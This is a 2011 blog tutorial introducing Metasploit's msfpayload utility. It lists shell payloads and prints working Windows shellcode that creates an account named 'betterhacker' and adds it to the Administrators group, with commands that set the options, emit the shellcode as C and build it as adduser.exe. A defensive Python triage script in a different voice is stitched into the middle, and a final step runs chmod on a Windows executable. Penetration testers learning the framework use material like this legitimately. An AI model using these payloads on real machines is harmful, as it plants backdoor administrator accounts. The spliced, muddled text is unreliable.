December 5, 2011

Metasploit's "other" utilities unleashed - I

Metasploit is a huge tool. When I started learning and playing with it, all I knew was use, set, exploit and run.
That was awesome and I was happy with that. But then I came to know that many Metasploit users don't use even half of the framework's capabilities. So I started exploring the Metasploit directory and lo, so many utilities were sitting there begging me to use them! In this multi-part series, I will introduce all these little gems packed in the Metasploit directory, ready to make your life a lot easier.

msfpayload
This is a command line utility in Metasploit used for generating shellcode or a standalone payload that can be delivered to the victim for execution. Its real benefit shows when developing new exploit modules and testing different types of shellcode against them.
The syntax for msfpayload is very simple.

Syntax:

Usage: ./msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

    -h        Help banner
    -l        List available payloads

msfpayload -l
Lists all available payloads, as expected.


Framework Payloads (228 total)
==============================


    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    bsd/x86/exec                                     Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port                          Spawn a shell on an established connection
    bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port                         Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                                 Executes the supplied command
    cmd/unix/interact                                Interacts with a shell on an established socket connection
--snip--


After choosing a payload, the options available for it can be listed by passing the 'O' or 'S' (summary) argument.


./msfpayload windows/adduser S
  Name: Windows Execute net user /ADD
  Module: payload/windows/adduser
  Version: 13053, 9179
  Platform: Windows
  Arch: x86
  Needs Admin: Yes
  Total size: 287
  Rank: Normal

Provided by:
  hdm <hdm@metasploit.com>
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
PASS      metasploit       yes       The password for this user
USER      metasploit       yes       The username to create

Description:
  Create a new user and add them to local administration group


So, from the above information, we know that this payload has three options (EXITFUNC, PASS, USER), each with a default value. We can change the values of these options if needed.


./msfpayload windows/adduser PASS=betterhacker USER=betterhacker O

--snip--


Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
PASS      betterhacker     yes       The password for this user
USER      betterhacker     yes       The username to create

This way, any option of a payload can be set on the command line. For example, if a payload requires an RHOST IP address, specify it as var=val:

./msfpayload windows/meterpreter/bind_tcp RHOST=192.168.1.2

The last part of the command syntax is the output format of the shellcode. The following output formats are supported: C, Perl, Ruby, JavaScript, Exe, Dll, VBA, Raw (the usage line above also lists War).

./msfpayload windows/adduser C

/*
 * windows/adduser - 287 bytes
 * http://www.metasploit.com
 * VERBOSE=false, EXITFUNC=process, USER=metasploit, 
 * PASS=metasploit
 */
unsigned char buf[] = 
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";

Now this shellcode can be directly used in an exploit!
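As an added example (not code from the post or from Metasploit), here is a small Python triage helper that reads a C-format dump like the one above, recovers the raw bytes and reports the size, SHA-256 and embedded printable strings. This is the check a defender runs on a generated payload to confirm what it actually does (here, the embedded `cmd.exe /c net user ... /ADD` command line) before writing a detection or a hash-based block rule for it. It assumes only the `unsigned char buf[] = "\x.."` layout shown above; the sample input is the post's own 287-byte adduser dump.

```python
"""Triage helper for msfpayload's C-format output (added example).

Parses the `unsigned char buf[]` array that `msfpayload <payload> C` prints,
recovers the raw bytes, and reports what a defender wants to know before
writing a detection: size, SHA-256 and any printable strings the payload
embeds. Nothing here executes the bytes.
"""
import hashlib
import re
from typing import Dict, List

# Constructed input: the C output of `./msfpayload windows/adduser C` exactly
# as printed in the post (287 bytes). A raw string keeps the \x escapes intact.
MSFPAYLOAD_C_OUTPUT = r'''/*
 * windows/adduser - 287 bytes
 * http://www.metasploit.com
 * VERBOSE=false, EXITFUNC=process, USER=metasploit,
 * PASS=metasploit
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x6d\x64\x2e"
"\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x6d\x65\x74"
"\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44\x44\x20\x26\x26"
"\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70"
"\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73"
"\x20\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x20\x2f\x41\x44"
"\x44\x00";
'''

_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)            # the /* ... */ header
_LITERAL_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')  # one "\x..\x.." fragment
_HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_c_shellcode(text: str) -> bytes:
    """Return the bytes encoded by the C string literals in an msfpayload C dump."""
    body = _COMMENT_RE.sub("", text)
    out = bytearray()
    for literal in _LITERAL_RE.findall(body):
        out.extend(int(h, 16) for h in _HEX_ESCAPE_RE.findall(literal))
    return bytes(out)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII (0x20..0x7e) at least min_len long, like strings(1)."""
    found: List[str] = []
    run = bytearray()
    for b in data + b"\x00":      # trailing NUL sentinel flushes the final run
        if 0x20 <= b <= 0x7E:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    return found


def triage(c_output: str) -> Dict[str, object]:
    """Size, SHA-256 and embedded strings for one msfpayload C-format dump."""
    data = parse_c_shellcode(c_output)
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "strings": extract_strings(data),
    }


if __name__ == "__main__":
    report = triage(MSFPAYLOAD_C_OUTPUT)
    print(f"size: {report['size']} bytes  sha256: {report['sha256']}")
    for s in report["strings"]:
        print("string:", s)
```

Run it as-is and the last string it prints is the full `net user ... && net localgroup Administrators ...` command line that the 287-byte blob carries in clear text, which is why an unencoded msfpayload build is trivial to flag with a strings-based rule; the next part of the series (msfencode) is exactly about removing such obvious markers, so the same helper is useful for checking whether an encoded build still leaks them.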

We can also create an executable from msfpayload.
./msfpayload windows/adduser USER=betterhacker PASS=betterhacker X > adduser.exe

Created by msfpayload (http://www.metasploit.com).

Payload: windows/adduser
 Length: 293
Options: {"USER"=>"betterhacker", "PASS"=>"betterhacker"}

This creates an exe file named 'adduser.exe'.
It won't run yet, because the file is written without the executable bit set. To add it:
chmod +x adduser.exe

Now this little executable is ready to run, and it works!
That is it for msfpayload. In the next part we will look at msfencode and msfvenom.